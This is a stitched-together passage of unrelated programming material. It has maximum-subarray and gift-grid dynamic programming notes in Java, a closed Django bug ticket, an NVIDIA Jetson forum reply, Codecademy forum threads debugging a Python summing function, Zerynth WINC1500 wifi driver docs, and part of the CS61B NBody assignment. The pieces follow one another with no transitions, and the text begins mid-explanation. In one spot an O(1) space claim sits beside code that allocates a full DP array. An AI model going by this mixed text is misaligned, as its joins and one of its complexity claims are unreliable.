- For the lSum of [l, r] there are two possibilities: it is either the lSum of the left subinterval, or the iSum of the left subinterval plus the lSum of the right subinterval, whichever is greater.
- Symmetrically, the rSum of [l, r] is either the rSum of the right subinterval, or the iSum of the right subinterval plus the rSum of the left subinterval, whichever is greater.
- Once these three are computed, the mSum of [l, r] follows easily. Consider whether the subarray realizing mSum crosses m:
  - If it does not cross m, then the mSum of [l, r] is either the mSum of the left subinterval or the mSum of the right subinterval;
  - If it crosses m, it is the rSum of the left subinterval plus the lSum of the right subinterval.
  - The answer is the largest of these three.

With that, the problem is solved.
class Solution {
    public class Status {
        public int lSum, rSum, mSum, iSum;

        public Status(int lSum, int rSum, int mSum, int iSum) {
            this.lSum = lSum;
            this.rSum = rSum;
            this.mSum = mSum;
            this.iSum = iSum;
        }
    }

    public int maxSubArray(int[] nums) {
        return getInfo(nums, 0, nums.length - 1).mSum;
    }

    public Status getInfo(int[] a, int l, int r) {
        if (l == r) {
            return new Status(a[l], a[l], a[l], a[l]);
        }
        int m = (l + r) >> 1;
        Status lSub = getInfo(a, l, m);
        Status rSub = getInfo(a, m + 1, r);
        return pushUp(lSub, rSub);
    }

    public Status pushUp(Status l, Status r) {
        int iSum = l.iSum + r.iSum;
        int lSum = Math.max(l.lSum, l.iSum + r.lSum);
        int rSum = Math.max(r.rSum, r.iSum + l.rSum);
        int mSum = Math.max(Math.max(l.mSum, r.mSum), l.rSum + r.lSum);
        return new Status(lSum, rSum, mSum, iSum);
    }
}
3. Dynamic programming + temporary variables
Dynamic programming analysis:
- State definition: let dp be the dynamic programming list, where dp[i] is the maximum sum of a contiguous subarray ending with element nums[i].
- Why must nums[i] be included in dp[i]: this guarantees the correctness of the recurrence from dp[i] to dp[i+1]; if nums[i] were not required, the recurrence would not respect the problem's contiguous-subarray requirement.
- Transition equation: if dp[i-1] ≤ 0, then dp[i-1] makes a negative contribution to dp[i], i.e. dp[i-1] + nums[i] is no larger than nums[i] itself.
  - When dp[i-1] > 0: dp[i] = dp[i-1] + nums[i];
  - When dp[i-1] ≤ 0: dp[i] = nums[i].
- Initial state: dp[0] = nums[0], i.e. the maximum sum of a contiguous subarray ending with nums[0] is nums[0] itself.
- Return value: return the maximum value in the dp list, which is the global maximum.
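The recurrence above can be sketched in Java (a sketch consistent with this section's definitions, not code from the original post):

```java
// dp-list approach: dp[i] is the maximum sum of a contiguous
// subarray that ends exactly at nums[i].
class MaxSubArrayDp {
    public static int maxSubArray(int[] nums) {
        int[] dp = new int[nums.length];
        dp[0] = nums[0];
        int best = dp[0];
        for (int i = 1; i < nums.length; i++) {
            // A positive dp[i-1] contributes; otherwise restart at nums[i].
            dp[i] = dp[i - 1] > 0 ? dp[i - 1] + nums[i] : nums[i];
            best = Math.max(best, dp[i]);
        }
        return best; // the global maximum over all ending positions
    }
}
```

For example, maxSubArray applied to [-2, 1, -3, 4, -1, 2, 1, -5, 4] returns 6, from the subarray [4, -1, 2, 1].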
4. Dynamic programming + in-place modification
Reducing the space complexity:
- Because dp[i] depends only on dp[i-1] and nums[i], the original array nums can be used as the dp list, i.e. we can modify nums directly.
- Since the extra dp list is omitted, the space complexity drops from O(N) to O(1).
Complexity analysis:
- Time complexity O(N): a single linear pass over nums produces the result, using O(N) time.
- Space complexity O(1): only constant extra space is used.
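A minimal sketch of this O(1)-space variant (illustrative code, not from the original post — note that it overwrites the input array):

```java
// In-place variant: reuse nums itself as the dp list.
class MaxSubArrayInPlace {
    public static int maxSubArray(int[] nums) {
        int best = nums[0];
        for (int i = 1; i < nums.length; i++) {
            if (nums[i - 1] > 0) {
                nums[i] += nums[i - 1]; // carry over a positive running sum
            }
            best = Math.max(best, nums[i]);
        }
        return best;
    }
}
```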
2. Maximum value of gifts
Jianzhi Offer 47. The maximum value of gifts
1. Dynamic programming + 2D array
package jzof.Day09;

/**
 * @author ahan
 * @create_time 2021-11-11-11:45 morning
 * There is a gift in each grid of an m*n chessboard, and each gift has a certain value (value greater than 0).
 * You can start from the upper left corner of the chessboard to take the gifts in the grid, and move one grid to the right or down at a time until you reach the lower right corner of the chessboard.
 * Given the value of a chessboard and the gifts on it, please calculate the maximum value of gifts you can get?
 */
public class _47 {
    public static void main(String[] args) {
        int[][] nums = new int[][]{
            {1, 3, 1},
            {1, 5, 1},
            {4, 2, 1}
        };
        System.out.println(new _47().maxValue(nums));
    }

    public int maxValue(int[][] grid) {
        int m = grid.length;
        int n = grid[0].length;
        int[][] dp = new int[m][n];
        dp[0][0] = grid[0][0];
        for (int i = 1; i < m; i++) {
            dp[i][0] = dp[i - 1][0] + grid[i][0];
        }
        for (int i = 1; i < n; i++) {
            dp[0][i] = dp[0][i - 1] + grid[0][i];
        }
        for (int i = 1; i < m; i++) {
            for (int j = 1; j < n; j++) {
                dp[i][j] = Math.max(dp[i - 1][j], dp[i][j - 1]) + grid[i][j];
            }
        }
        for (int i = 0; i < m; i++) {
            for (int j = 0; j < n; j++) {
                System.out.print(dp[i][j] + "\t");
            }
            System.out.println();
        }
        return dp[m - 1][n - 1];
    }
}
It's the same idea and method as the reference solution, hahaha ~ but the reference solution modifies the grid in place...
My version's space efficiency is not much worse~
Complexity analysis:
- Time complexity O(MN): M and N are the number of rows and columns of the matrix; dynamic programming traverses the whole grid, using O(MN) time.
- Space complexity O(1): the in-place modification uses only constant extra space.
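The in-place version alluded to above might look like this (a sketch written for illustration; it overwrites grid rather than allocating a dp array):

```java
// In-place gift DP: grid[i][j] becomes the best total value
// reachable at cell (i, j) moving only right or down.
class MaxGiftValueInPlace {
    public static int maxValue(int[][] grid) {
        int m = grid.length, n = grid[0].length;
        for (int i = 0; i < m; i++) {
            for (int j = 0; j < n; j++) {
                if (i == 0 && j == 0) continue;               // start cell unchanged
                if (i == 0) grid[i][j] += grid[i][j - 1];      // first row: only from the left
                else if (j == 0) grid[i][j] += grid[i - 1][j]; // first column: only from above
                else grid[i][j] += Math.max(grid[i - 1][j], grid[i][j - 1]);
            }
        }
        return grid[m - 1][n - 1];
    }
}
```

On the sample board {{1,3,1},{1,5,1},{4,2,1}} this returns 12, matching the 2D-array version.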
2. Optimized code: pad with one extra row and column of zeros
public int maxValue(int[][] grid) {
    int row = grid.length;
    int column = grid[0].length;
    // dp[i][j] represents the maximum value from grid[0][0] to grid[i - 1][j - 1]
    int[][] dp = new int[row + 1][column + 1];
    for (int i = 1; i <= row; i++) {
        for (int j = 1; j <= column; j++) {
            dp[i][j] = Math.max(dp[i - 1][j], dp[i][j - 1]) + grid[i - 1][j - 1];
        }
    }
    return dp[row][column];
}
Opened 4 years ago
Closed 4 years ago
#16868 closed Bug (invalid)
Typo in last code fragment in tutorial part 3
Description
Hi, thanks for the excellent tutorial. There's a typo in the last fragment of tutorial page 3, the refactored polls/urls.py:
from django.conf.urls import patterns, include, url
It should be "from django.conf.urls.default import..."
Change History (1)
comment:1 Changed 4 years ago by julien
- Needs documentation unset
- Needs tests unset
- Patch needs improvement unset
- Resolution set to invalid
- Status changed from new to closed
Thanks for the report, but I assume you must be looking at the wrong version of the doc (i.e. instead of). Since quite recently in r16818, the functions in django.conf.urls.defaults have been moved to django.conf.urls.
I am walking through the Jetson Nano AI course, and was using the nvdli-nano to run the CNN on Jetson Nano. I went through the code lines in the jupyter notebook, and don’t find a line that specify the training to be performed in GPU. I wonder if that is inferred somewhere, or set by default? If I have both a CPU and GPU, how should I allocate the computational power of each to perform the task?
Hi,
Please note that Jetson is designed mainly for inference.
For training on Jetson, you can check if this page can meet your requirement:
To check if a framework is running on GPU, you can use the API like this:
import torch
print(torch.cuda.is_available())
Thanks.
In the nvdli-nano notebooks, if you look at where the model is initially created, there are these lines of code:
device = torch.device('cuda')
# model is created...
model = model.to(device)
This tells PyTorch to run the model on the CUDA device, and hence both training and inference will be done using the GPU.
But I only want to run the for loop as long as the sum is < 9000. So the for loop runs while sum <9000. I can make it work by taking out the “while” and using “if sum > 9000 // break” instead, but I want to understand why the “while” approach is wrong?
It doesn’t work like that. The for loop will run all of its iterations (looping over all elements in the list).
The instructions state:
The function should sum the elements of the list until the sum is greater than
9000.
Therefore, if sum has reached exactly 9000 and there are still additional elements to process, we’re not done yet. A common source of software bugs is failure to account for edge cases.
Hi all,
I’m looking for some feedback on my answer here. My code returns the right answer, but I ALSO get the error “list index out of range”. What do I need to improve in my code? Any feedback is appreciated! Thank you!
#Write your function here
def over_nine_thousand(lst):
    count = lst[0]
    indice = 1
    while(count < 9000 and indice < len(lst)):
        count += lst[indice]
        indice += 1
    else:
        return count

#Uncomment the line below when your function is done
print(over_nine_thousand([8000, 900, 120, 5000]))
The exercise might have a test case / corner case where you get an empty list, which would be a problem for your code.
hi, i wonder why the second one is not working.
why is it indentation error?
Hey i am wondering why these are not correct:
1:
def over_nine_thousand(lst):
    sum = 0
    for n in lst:
        sum += n
        if sum >= 9000 and len(lst) > 0:
            break
            return sum
print(over_nine_thousand([8000, 900, 120, 5000]))
The output will be None instead of 9020.
2:
def over_nine_thousand(lst):
    sum = 0
    for n in lst:
        sum += n
        if sum >= 9000 and len(lst) > 0:
            break
        return sum
print(over_nine_thousand([8000, 900, 120, 5000]))
This one would be 8000.
Can someone explain why these two scripts are wrong? From my perspective, they are the same as the correct solution.
They are absolutely not the same as the solution. Neither covers the edge case of an empty list: if the list is empty, the loop never runs, so the return keyword is never reached.
In the first example, break would break the loop, so again, the return keyword isn’t reached.
its important to understand that when a return keyword is reached, data is handed back to the caller which signals the function is done executing
so in your second code sample, the return keyword is reached in the first iteration of the loop, handing back the sum of the first value.
This was my code for the Over 9000 exercise:
def over_nine_thousand(lst):
    sum1 = 0
    for num in lst:
        if sum1 <= 9000:
            sum1 += num
        elif sum1 > 9000:
            return sum1
        elif len(lst) == 0:
            return 0

print(over_nine_thousand([8000, 900, 120, 5000]))
I get the correct output for the exercise, yet this message appears at the bottom:
“over_nine_thousand([8000, 900]) should have returned 8900, and it returned None”
Thus, I am not able to progress. I checked the code in my terminal and achieved the same output.
The troubleshooting I tried involved attempting to print the value of “sum1”. The value would not print, however, no matter where I put the print command and no matter the indentation I tried, so my troubleshooting hit a brick wall (as far as trying to get the output to reveal any clues for me goes).
Try running the code in your head for the input given in the error message. The SCT for the exercise tests input other than the list given in the example, such as [8000, 900]. The message states that it should return 8900, which is correct, no? Your code returns None for that input. If you follow what happens with your finger or in your head, you’ll see that None is returned. If the code inside a function finishes executing without a return statement being executed, the function implicitly returns None.
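Putting the advice in this thread together, one sketch that handles both the early stop and the empty-list edge case (not an official solution; the variable name total is chosen to avoid shadowing the built-in sum) is:

```python
def over_nine_thousand(lst):
    total = 0
    for n in lst:
        total += n
        if total > 9000:  # strictly greater: exactly 9000 keeps summing
            break
    return total  # reached for every input, including an empty list (returns 0)

print(over_nine_thousand([8000, 900, 120, 5000]))  # prints 9020
```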
WINC1500 Module¶
This module implements the winc1500 wifi driver. At the moment some functionalities are missing:
- wifi ap mode
- wifi direct p2p mode
- internal firmware ota upgrade
It can be used to enable Arduino/Genuino MKR1000 wifi capabilities or with any other device mounting Microchip WINC1500 IEEE 802.11 network controller.
Zerynth driver current implementation supports only communication with the chip through standard SPI interface.
Note
Zerynth driver is based on Microchip driver version 19.5.4 provided with Advanced Software Framework version 3.37.0 requiring the internal Firmware to be upgraded at least to version 19.5.4. For the upgrading procedure follow this guide: Firmware Updater.
The WINC1500 chip supports secure connections through tls v1.2. To take advantage of this feature import the ssl module or simply try https requests with Zerynth requests module.
Note
To access securely specific websites root certificates must be loaded on the chip: Certificate Uploading.
To use the module expand on the following example:
from microchip.winc1500 import winc1500 as wifi_driver
from wireless import wifi

wifi_driver.auto_init()
for retry in range(10):
    try:
        wifi.link("Network-SSID", wifi.WIFI_WPA2, "password")
        break
    except Exception as e:
        print(e)
if not wifi.is_linked():
    raise IOError
To initialize the driver the following parameters are needed:
- MCU SPI circuitry spidrv (one of SPI0, SPI1, ... check pinmap for details);
- chip select pin cs;
- interrupt pin int_pin;
- reset pin rst;
- enable pin enable;
- wake pin wake (can be not set);
- clock clock, default at 8MHz.
Note
For supported boards (e.g. Arduino/Genuino MKR1000), auto_init function is available with preset params.
A heads up before you even read the introduction: We are the beta testers for Gradescope's new grading system. There may be glitches at the beginning of the semester. Please be friendly.
Please report any errors using this autograder thread on Piazza.
Introduction
The goal of this project is to give you a crash course in Java. CS61B is not a course about Java, so we're going to race through the language in just 4 weeks. You've already taken CS61A, E7, or some equivalent course, so it's time to get used to learning languages quickly.
Before starting this project, we are assuming that you either have prior Java experience, or have watched lecture 2 and (ideally) have also completed HW0. If you have not watched lecture 2, do so now. The code that I built during that lecture can be found at this link. You do not need to fully understand the contents of lecture 2 to begin this assignment. Indeed, the main purpose of this project is to help you build some comfort with the material in that lecture.
Unlike later projects, this assignment has a great deal of scaffolding. Future assignments will require significantly more independence. For this project, you may work in pairs. To work in a pair, you must read the collaboration guide and fill out the partner request form linked in the partnership guide. You do not need to wait for our approval to begin as long as you meet the requirements for partnerships. If you work with someone who is more experienced, you are likely to miss lots of important subtleties, which will be painful later when you start working on your own (i.e. the entire second half of the course).
All that said, your goal for this project is to write a program simulating the motion of N objects in a plane, accounting for the gravitational forces mutually affecting each object as demonstrated by Sir Isaac Newton's Law of Universal Gravitation.
Ultimately, you will be creating a program
NBody.java that draws an animation of bodies floating around in space tugging on each other with the power of gravity.
If you run into problems, be sure to check out the FAQ section before posting to Piazza. We'll keep this section updated as questions arise during the assignment.
Getting the Skeleton Files
Before proceeding, make sure you have completed lab1, and if you are working on your own computer, that you have completed lab1b to set up your computer.
To do this, head to the folder containing your copy of your repository. For example, if your login is 'agz', then head to the 'agz' folder (or any subdirectory). If you're working with a partner, you should instead clone your partner repository, e.g.
git clone
If you're working solo, you should now be in your personal repo folder, e.g.
agz. If you're working with a partner, your computers should both be in the
bqd-aba folder that was created when you cloned the repo.
Now we'll make sure you have the latest copy of the skeleton files by using
git pull skeleton master. If you're using your partner repo, you'll also need to set the remote just like we did in lab1 using the
git remote add skeleton command.
If the folder you're pulling into already has an older copy of the skeleton repo (from lab 1, for example), this will cause a so-called
merge (see git guide for more details if you want). A text editor will automatically open asking you to provide a message on why you are merging.
Depending on what computer you're using, you will possibly find yourself in one of two obtuse text editors:
- vim
- emacs
Both of these editors are designed with the power user in mind, with no regard for those stumbling into them by accident. Unfortunately, git will likely default to one of these text editors, meaning that the simple act of providing a merge message may cause you considerable consternation. Don't worry, this is normal! One of the goals of 61B is to teach you to handle these sorts of humps. Indeed, one of the reasons we're making you use a powerful real-world version control system like git this semester is to have you hit these common hurdles now in a friendly pedagogical environment instead of the terrifying real world. However, this also means we're going to suffer sometimes, particularly at this early point in the semester. Don't panic!
For reference, this is what vim looks like:
See this link if you are stuck in vim. If you are in emacs, type something and then press ctrl-x then ctrl-s to save, then ctrl-x then ctrl-c to exit.
Once you've successfully merged, you should see a proj0 directory appear with files that match the skeleton repository.
Note that if you did not already have a copy of the skeleton repo in your current folder, you will not be asked for a merge message.
If you somehow end up having a merge conflict, consult the git weird technical failures guide.
If you get some sort of error, STOP and either figure it out by carefully reading the git guide or seek help at OH or Piazza. You'll potentially save yourself a lot of trouble vs. guess-and-check with git commands. If you find yourself trying to use commands you Google like
force push, don't.
The Planet Class and Its Constructor
You'll start by creating a Planet class. In your favorite text editor, create a file called
Planet.java. If you haven't picked a text editor, I recommend Sublime Text. Remember that your .java files should have the same name as the class it contains.
Begin by creating a basic version of the Planet class with the following 6 instance variables:
double xxPos: Its current x position
double yyPos: Its current y position
double xxVel: Its current velocity in the x direction
double yyVel: Its current velocity in the y direction
double mass: Its mass
String imgFileName: The name of an image in the
imagesdirectory that depicts the planet
Your instance variables must be named exactly as above. Start by adding in two Planet constructors that can initialize an instance of the Planet class. The signature of the first constructor should be:
public Planet(double xP, double yP, double xV, double yV, double m, String img)
Note: We have given parameter names which are different than the corresponding instance variable name. If you insist on making the parameter names the same as the instance variable names for aesthetic reasons, make sure to use the "this" keyword appropriately (mentioned only briefly in lecture and not at all in HFJ).
The second constructor should take in a Planet object and initialize an identical Planet object (i.e. a copy). The signature of the second constructor should be:
public Planet(Planet p)
Your Planet class should NOT have a main method, because we'll never run the Planet class directly (i.e. we will never do
java Planet). Also, the word "static" should not appear anywhere in your Planet class.
All of the numbers for this project will be doubles. We'll go over what exactly a double is later in the course, but for now, think of it as a real number, e.g.
double x = 3.5. In addition, all instance variables and methods will be declared using the public keyword.
Once you have filled in the constructors, you can test it out by compiling your
Planet.java file and the
TestPlanetConstructor.java file we have provided.
You can compile with the command:
javac Planet.java TestPlanetConstructor.java
You can run our provided test with the command
java TestPlanetConstructor
If you pass this test, you're ready to move on to the next step. Do not proceed until you have passed this test.
Understanding the Physics
Let's take a step back now and look at the physics behind our simulations. Our
Planet objects will obey the laws of Newtonian physics. In particular, they will be subject to:
Pairwise Force: Newton's law of universal gravitation asserts that the strength of the gravitational force between two particles is given by the product of their masses divided by the square of the distance between them, scaled by the gravitational constant G (6.67 * 10^-11 N·m^2 / kg^2). The gravitational force exerted on a particle is along the straight line between them (we are ignoring here strange effects like the curvature of space). Since we are using Cartesian coordinates to represent the position of a particle, it is convenient to break up the force into its x- and y-components (Fx, Fy). The relevant equations are shown below. We have not derived these equations, and you should just trust us.
- F = G * m1 * m2 / r^2
- r^2 = dx^2 + dy^2
- Fy = F * dy / r
- Fx = F * dx / r
Note that force is a vector (i.e., it has direction). In particular, be aware that dx and dy are signed (positive or negative).
- Net Force: The principle of superposition says that the net force acting on a particle in the x- or y-direction is the sum of the pairwise forces acting on the particle in that direction.
In addition, all planets have:
Acceleration: Newton's second law of motion says that the accelerations in the x- and y-directions are given by:
- ax = Fx / m
- ay = Fy / m
Check your understanding!
Consider a small example consisting of two celestial objects: Saturn and the Sun. Suppose the Sun is at coordinates (1.0 * 10^12, 2.0 * 10^11) and Saturn is at coordinates (2.3 * 10^12, 9.5 * 10^11). Assume that the Sun's mass is 2.0 * 10^30 Kg and Saturn's mass is 6.0 * 10^26 Kg. Here's a diagram of this simple solar system:
Let's run through some sample calculations. First let's compute F1, the force that Saturn exerts on the Sun. We'll begin by calculating r, which we've already expressed above in terms of dx and dy. Since we're calculating the force exerted by Saturn, dx is Saturn's x-position minus the Sun's x-position, which is 1.3 * 10^12 meters. Similarly, dy is 7.5 * 10^11 meters.
So, r^2 = dx^2 + dy^2 = (1.3 * 10^12 m)^2 + (7.5 * 10^11 m)^2. Solving for r gives us 1.5 * 10^12 meters. Now that we have r, computation of F is straightforward:
- F = G * (2.0 * 10^30 Kg) * (6.0 * 10^26 Kg) / (1.5 * 10^12 m)^2 = 3.6 * 10^22 N
Note that the magnitudes of the forces that Saturn and the Sun exert on one another are equal; that is, |F| = |F1| = |F2|. Now that we've computed the pairwise force on the Sun, let's compute the x- and y-components of this force, denoted F1,x and F1,y, respectively. Recall that dx is 1.3 * 10^12 meters and dy is 7.5 * 10^11 meters. So,
- F1,x = F1 * (1.3 * 10^12 m) / (1.5 * 10^12 m) = 3.1 * 10^22 N
- F1,y = F1 * (7.5 * 10^11 m) / (1.5 * 10^12 m) = 1.8 * 10^22 N
Note that the sign of dx and dy is important! Here, dx and dy were both positive, resulting in positive values for F1,x and F1,y. This makes sense if you look at the diagram: Saturn will exert a force that pulls the Sun to the right (positive F1,x ) and up (positive F1,y).
Next, let's compute the x and y-components of the force that the Sun exerts on Saturn. The values of dx and dy are negated here, because we're now measuring the displacement of the Sun relative to Saturn. Again, you can verify that the signs should be negative by looking at the diagram: the Sun will pull Saturn to the left (negative dx) and down (negative dy).
- F2,x = F2 * (-1.3 * 10^12 m) / (1.5 * 10^12 m) = -3.1 * 10^22 N
- F2,y = F2 * (-7.5 * 10^11 m) / (1.5 * 10^12 m) = -1.8 * 10^22 N
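The arithmetic above can be checked with a short sketch (illustrative code only — this is not the Planet class you will write, and the class and method names here are made up):

```java
public class ForceDemo {
    static final double G = 6.67e-11; // gravitational constant, N·m^2 / kg^2

    // Magnitude of the gravitational force between two masses.
    static double force(double dx, double dy, double m1, double m2) {
        double r2 = dx * dx + dy * dy;
        return G * m1 * m2 / r2;
    }

    // x-component of that force; dx is signed, so the sign comes out right.
    static double forceX(double dx, double dy, double m1, double m2) {
        double r = Math.sqrt(dx * dx + dy * dy);
        return force(dx, dy, m1, m2) * dx / r;
    }

    public static void main(String[] args) {
        double dx = 1.3e12, dy = 7.5e11;        // Saturn's position minus the Sun's
        double mSun = 2.0e30, mSaturn = 6.0e26;
        System.out.println(force(dx, dy, mSun, mSaturn));  // about 3.6e22 N
        System.out.println(forceX(dx, dy, mSun, mSaturn)); // about 3.1e22 N
    }
}
```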
Below, you'll write the methods
calcForceExertedByX and
calcForceExertedByY in the
Planet class. When you're done with those methods,
sun.calcForceExertedByX(saturn) and
sun.calcForceExertedByY(saturn) should return F1,x and F1,y, respectively; similarly,
saturn.calcForceExertedByX(sun) and
saturn.calcForceExertedByY(sun) should return F2,x and F2,y, respectively.
Let's add Neptune to the mix and calculate the net force on Saturn. Here's a diagram illustrating the forces being exerted on Saturn in this new system:
We can calculate the x-component of the net force on Saturn by summing the x-components of all pairwise forces. Likewise, Fnet,y can be calculated by summing the y-components of all pairwise forces. Assume the forces exerted on Saturn by the Sun are the same as above, and that F2,x = 1.1 * 10^22 N and F2,y = 9.0 * 10^21 N.
- Fnet,x = F1,x + F2,x = -3.1 * 10^22 N + 1.1 * 10^22 N = -2.0 * 10^22 N
- Fnet,y = F1,y + F2,y = -1.8 * 10^22 N + 9.0 * 10^21 N = -9.0 * 10^21 N
Double check your understanding!
Suppose there are three bodies in space as follows:
- Samh: x = 1, y = 0, mass = 10
- AEgir: x = 3, y = 3, mass = 5
- Rocinante: x = 5, y = -3, mass = 50
Calculate Fnet,x and Fnet,y exerted on Samh. To check your answer, click here for the net x force and here for the net y force.
Writing the Planet Class
In our program, we'll have instances of Planet class do the job of calculating all the numbers we learned about in the previous example. We'll write helper methods, one by one, until our Planet class is complete.
calcDistance
Start by adding a method called
calcDistance that calculates the distance between two Planets. This method will take in a single Planet and should return a double equal to the distance between the supplied planet and the planet that is doing the calculation, e.g.
samh.calcDistance(rocinante);
It is up to you this time to figure out the signature of the method. Once you have completed this method, go ahead and recompile and run the next unit test to see if your code is correct.
Compile with:
javac Planet.java TestCalcDistance.java
and run with
java TestCalcDistance
Hint: In Java, there is no built in operator that does squaring or exponentiation. We recommend simply multiplying a symbol by itself instead of using
Math.pow, which will result in slower code.
Hint 2: Always try googling before asking questions on Piazza. Knowing how to find what you want on Google is a valuable skill. However, know when to give up! If you start getting frustrated with your search attempts, turn to Piazza.
calcForceExertedBy
The next method that you will implement is
calcForceExertedBy. The
calcForceExertedBy method takes in a planet, and returns a double describing the force exerted on this planet by the given planet. You should be calling the
calcDistance method in this method. For example
samh.calcForceExertedBy(rocinante) for the numbers in "Double Check Your Understanding" should return 1.334 * 10^-9.
NOTE: Do not use Math.abs to fix sign issues with these methods. This will cause issues later when drawing planets.
Once you've finished
calcForceExertedBy, re-compile and run the next unit test.
javac Planet.java TestCalcForceExertedBy.java java TestCalcForceExertedBy
calcForceExertedByX and calcForceExertedByY
The next two methods that you should write are
calcForceExertedByX and
calcForceExertedByY. Unlike the
calcForceExertedBy method, which returns the total force, these two methods describe the force exerted in the X and Y directions, respectively. Once you've finished, you can recompile and run the next unit test. For example
samh.calcForceExertedByX(rocinante) in "Double Check Your Understanding" should return 1.0672 * 10^-9.
javac Planet.java TestCalcForceExertedByXY.java java TestCalcForceExertedByXY
calcNetForceExertedByX and calcNetForceExertedByY
Write methods
calcNetForceExertedByX and
calcNetForceExertedByY that each take in an array of Planets and calculate the net X and net Y force exerted by all planets in that array upon the current Planet. For example, consider the code snippet below:
Planet[] allPlanets = {samh, rocinante, aegir}; samh.calcNetForceExertedByX(allPlanets); samh.calcNetForceExertedByY(allPlanets);
The two calls here would return the values given in "Double Check Your Understanding."
As you implement these methods, remember that Planets cannot exert gravitational forces on themselves! Can you think of why that is the case (hint: the universe will possibly collapse in on itself, destroying everything including you)? To avoid this problem, ignore any planet in the array that is equal to the current planet. To compare two planets, use the .equals method:
samh.equals(samh) (which would return true).
When you are done go ahead and run:
javac Planet.java TestCalcNetForceExertedByXY.java java TestCalcNetForceExertedByXY
If you're tired of the verbosity of for loops, you might consider reading about less verbose looping constructs (for and the 'enhanced for') given on page 114-116 of HFJ, or online at this link. This is not necessary to complete the project.
update
Next, you'll add a method that determines how much the forces exerted on the planet will cause that planet to accelerate, and the resulting change in the planet's velocity and position in a small period of time dt. For example,
samh.update(0.005, 10, 3) would adjust the velocity and position if an x-force of 10 Newtons and a y-force of 3 Newtons were applied for 0.005 seconds.
You must compute the movement of the Planet using the following steps:
- Calculate the acceleration using the provided x and y forces.
- Calculate the new velocity by using the acceleration and current velocity. Recall that acceleration describes the change in velocity per unit time, so the new velocity is (vx + dt * ax, vy + dt * ay).
- Calculate the new position by using the velocity computed in step 2 and the current position. The new position is (px + dt * vx, py + dt * vy).
Let's try an example! Consider a squirrel initially at position (0, 0) with a vx of 3 m/s and a vy of 5 m/s. Fnet,x is -5 N and Fnet,y is -2 N. Here's a diagram of this system:
We'd like to update with a time step of 1 second. First, we'll calculate the squirrel's net acceleration:
- anet,x = Fnet,x / m = -5 N / 1 Kg = -5 m/s^2
- anet,y = Fnet,y / m = -2 N / 1 Kg = -2 m/s^2
With the addition of the acceleration vectors we just calculated, our system now looks like this:
Second, we'll calculate the squirrel's new velocity:
- vnew,x = vold,x + dt * anet,x = 3 m/s + 1 s * -5 m/s^2 = -2 m/s
- vnew,y = vold,y + dt * anet,y = 5 m/s + 1 s * -2 m/s^2 = 3 m/s
Third, we'll calculate the new position of the squirrel:
- pnew,x = pold,x + dt * vnew,x = 0 m + 1 s * -2 m/s = -2 m
- pnew,y = pold,y + dt * vnew,y = 0 m + 1 s * 3 m/s = 3 m
Here's a diagram of the updated system:
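As a sanity check on the squirrel numbers, the three update steps can be written out directly (illustrative only; class and method names here are made up, and your real update method will live inside the Planet class):

```java
public class UpdateDemo {
    // Returns {newVx, newVy, newPx, newPy} after applying force (fX, fY)
    // to a body of the given mass for dt seconds.
    static double[] step(double px, double py, double vx, double vy,
                         double mass, double dt, double fX, double fY) {
        double ax = fX / mass;      // step 1: acceleration
        double ay = fY / mass;
        double nvx = vx + dt * ax;  // step 2: new velocity
        double nvy = vy + dt * ay;
        double npx = px + dt * nvx; // step 3: new position (uses the NEW velocity)
        double npy = py + dt * nvy;
        return new double[]{nvx, nvy, npx, npy};
    }

    public static void main(String[] args) {
        // Squirrel: p = (0, 0), v = (3, 5), m = 1 Kg, force (-5, -2) N, dt = 1 s.
        double[] s = step(0, 0, 3, 5, 1, 1, -5, -2);
        System.out.println(s[0] + " " + s[1] + " " + s[2] + " " + s[3]);
        // -2.0 3.0 -2.0 3.0
    }
}
```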
For math/physics experts: You may be tempted to write a more accurate simulation where the force gradually increases over the specified time window. Don't! Your simulation must follow exactly the rules above.
Write a method
update(dt, fX, fY) that uses the steps above to update the planet's position and velocity instance variables (this method does not need to return anything).
Once you're done, recompile and test your method with:
javac Planet.java TestUpdate.java java TestUpdate
Once you've done this, you've finished implementing the physics. Hoorah! You're halfway there.
(Optional) Testing Your Planet
As the semester progresses, we'll be giving you fewer and fewer tests, and it will be your responsibility to write your own tests. Writing tests is a good way to improve your workflow and be more efficient.
Go ahead and try writing your own test for the Planet class. Make a
TestPlanet.java file and write a test that creates two planets and prints out the pairwise force between them. We will not be grading this part of the assignment.
Getting Started with the Simulator (NBody.java)
NBody is a class that will actually run your simulation. This class will have NO constructor. The goal of this class is to simulate a universe specified in one of the data files. For example, if we look inside data/planets.txt (using the command line
more command), we see the following:
$ more planets.txt
5
2.50e+11
1.4960e+11 0.0000e+00 0.0000e+00 2.9800e+04 5.9740e+24 earth.gif
2.2790e+11 0.0000e+00 0.0000e+00 2.4100e+04 6.4190e+23 mars.gif
5.7900e+10 0.0000e+00 0.0000e+00 4.7900e+04 3.3020e+23 mercury.gif
0.0000e+00 0.0000e+00 0.0000e+00 0.0000e+00 1.9890e+30 sun.gif
1.0820e+11 0.0000e+00 0.0000e+00 3.5000e+04 4.8690e+24 venus.gif
The input format is a text file that contains the information for a particular universe (in SI units). The first value is an integer N which represents the number of planets. The second value is a real number R which represents the radius of the universe, used to determine the scaling of the drawing window. Finally, there are N rows, and each row contains 6 values: the x- and y-coordinates of the planet's initial position, the x- and y-components of its initial velocity, its mass, and the name of an image file used to draw the planet. Image files can be found in the images directory. The file above contains data for our own solar system (up to Mars).
ReadRadius
Your first method is readRadius. Given a file name, it should return a double corresponding to the radius of the universe in that file, e.g. readRadius("./data/planets.txt") should return 2.50e+11.
To help you understand the In class, we've provided an example called InDemo.java, which you can find in the examples folder that came with the skeleton. This demo does not perfectly match what you'll be doing in this project! However, every method that you need is used somewhere in this file. You're also welcome to search the web for other examples (though it might be tricky to find anything, since the class name In is such a common English word).
Alternatively, you can consult the full documentation for the In class, though you might find it a bit intimidating.
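If it helps to see the general pattern without spoiling the exercise: for whitespace-separated input like this, In behaves much like java.util.Scanner. Here's a hedged Scanner-based sketch of reading the header values (the real In API uses readInt() and readDouble() instead; the sample string is the start of planets.txt):

```java
import java.util.Scanner;

// Scanner stand-in for the course's In class: read the planet count and
// universe radius from the front of a planets.txt-style input.
public class HeaderSketch {
    public static void main(String[] args) {
        String sample = "5\n"
                + "2.50e+11\n"
                + "1.4960e+11 0.0000e+00 0.0000e+00 2.9800e+04 5.9740e+24 earth.gif\n";
        Scanner in = new Scanner(sample);
        int numPlanets = Integer.parseInt(in.next());   // analogous to readInt()
        double radius = Double.parseDouble(in.next());  // analogous to readDouble()
        System.out.println(numPlanets + " " + radius);  // prints: 5 2.5E11
    }
}
```

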